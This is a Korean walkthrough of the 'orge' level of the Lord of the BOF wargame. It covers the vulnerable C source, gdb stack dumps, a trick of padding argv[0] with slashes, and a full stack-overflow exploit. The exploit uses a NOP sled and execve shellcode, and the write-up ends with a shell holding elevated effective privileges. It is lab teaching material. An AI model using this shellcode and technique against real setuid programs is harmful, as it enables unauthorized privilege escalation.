LOB darkelf => orge
문제
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}//here is changed 라고 친절하게 주석을 달아서 소스 코드에 달라진 부분을 짚어주었다.
이번 문제는 argv[0]의 길이가 77인지를 검사한 후 뒷 부분은 전과 같다.
풀이
[darkelf@localhost darkelf]$ .///////orge aa
argv[0] error
[darkelf@localhost darkelf]$ ././orge
argv error첫번째 실행을 위한 인자의 길이를 77로 만들라니 저걸 어떻게 풀지? 라고 하다가 단순하게 그냥 ././././ 이런 식이나 .//////////////이런식으로 실행 인자를 주어봤는데 되었다.... 새로운 지식이 하나 더 늘었다.
그럼 이제 .////////... 식으로 .////.../orge 의 길이를 77로 해준다음 darkelf 때와 마찬가지로 풀면 될 것 같다.
[darkelf@localhost tmp]$ /bin/bash2
[darkelf@localhost tmp]$ gdb orge
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) set disassembly-flavor intel
(gdb) b*main
Breakpoint 1 at 0x8048500
(gdb) r `python -c "print 'A'*47 + '\xbf'"`
Starting program: /home/darkelf/tmp/orge `python -c "print 'A'*47 + '\xbf'"`
Breakpoint 1, 0x8048500 in main ()
(gdb) x/100wx $esp
--- 생략 ---
0xbffffbec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbfc: 0x00000000 0x69000000 0x00363836 0x6d6f682f
0xbffffc0c: 0x61642f65 0x6c656b72 0x6d742f66 0x726f2f70
0xbffffc1c: 0x41006567 0x41414141 0x41414141 0x41414141
0xbffffc2c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc3c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc4c: 0x00bf4141 0x5353454c 0x4e45504f 0x752f7c3d
(gdb)
0xbffffc5c: 0x622f7273 0x6c2f6e69 0x70737365 0x2e657069
0xbffffc6c: 0x25206873 0x53550073 0x414e5245 0x003d454d
0xbffffc7c: 0x54534948 0x455a4953 0x3030313d 0x4f480030
0xbffffc8c: 0x414e5453 0x6c3d454d 0x6c61636f 0x74736f68
0xbffffc9c: 0x636f6c2e 0x6f646c61 0x6e69616d 0x474f4c00
0xbffffcac: 0x454d414e 0x7261643d 0x666c656b 0x4d455200
0xbffffcbc: 0x4845544f 0x3d54534f 0x2e323931 0x2e383631
0xbffffccc: 0x2e333931 0x414d0031 0x2f3d4c49 0x2f726176
--- 생략 ---
(gdb) q대충 A가 들어가는 위치를 파악하기 위해 디버깅 하였다.
[darkelf@localhost tmp]$ `python -c "print '.'+'/'*72+'orge ' + 'A'*44+'\x4c\xfd\xff\xbf ' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL?
Segmentation fault (core dumped)
[darkelf@localhost tmp]$그 후 대충 예상되는 주소로 리턴 주소를 넣고 NOP를 여러개 끼운 다음 쉘코드를 넣어 실행해봤더니 세그먼트 오류와 함께 코어 덤프가 되었다.
[darkelf@localhost tmp]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `.////////////////////////////////////////////////////////////////////////orge A'.
Program terminated with signal 11, Segmentation fault.
#0 0xbffffff7 in ?? ()
(gdb) x/100wx $esp
--- 생략 ---
0xbffffaa0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffab0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffac0: 0x00000000 0x69000000 0x00363836 0x2f2f2f2e
0xbffffad0: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
0xbffffae0: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
0xbffffaf0: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
0xbffffb00: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
(gdb)
0xbffffb10: 0x2f2f2f2f 0x67726f2f 0x41410065 0x41414141
0xbffffb20: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb30: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb40: 0x41414141 0xfd4c4141 0x9000bfff 0x90909090
0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffba0: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffbb0: 0x2f6850c0 0x6868732f 0x6e69622f 0x5350e389
0xbffffbc0: 0xc289e189 0x80cd0bb0 0x00000000 0x00000000
0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000
--- 생략 ---
(gdb) 그래서 core 파일을 분석하여 다시 점프해야 하는 주소를 찾아 놉 중간으로 점프 주소를 바꾸어서 실행하였다.
[darkelf@localhost tmp]$ `python -c "print '.'+'/'*72+'orge ' + 'A'*44+'\xa0\xfb\xff\xbf ' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??
bash$ id
uid=506(darkelf) gid=506(darkelf) groups=506(darkelf)
bash$ tmp 파일에서 성공적으로 bash 가 실행되었다. 이제 본 파일에서 실행해보자.
[darkelf@localhost darkelf]$ /bin/bash2
[darkelf@localhost darkelf]$ `python -c "print '.'+'/'*72+'orge ' + 'A'*44+'\xa0\xfb\xff\xbf ' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$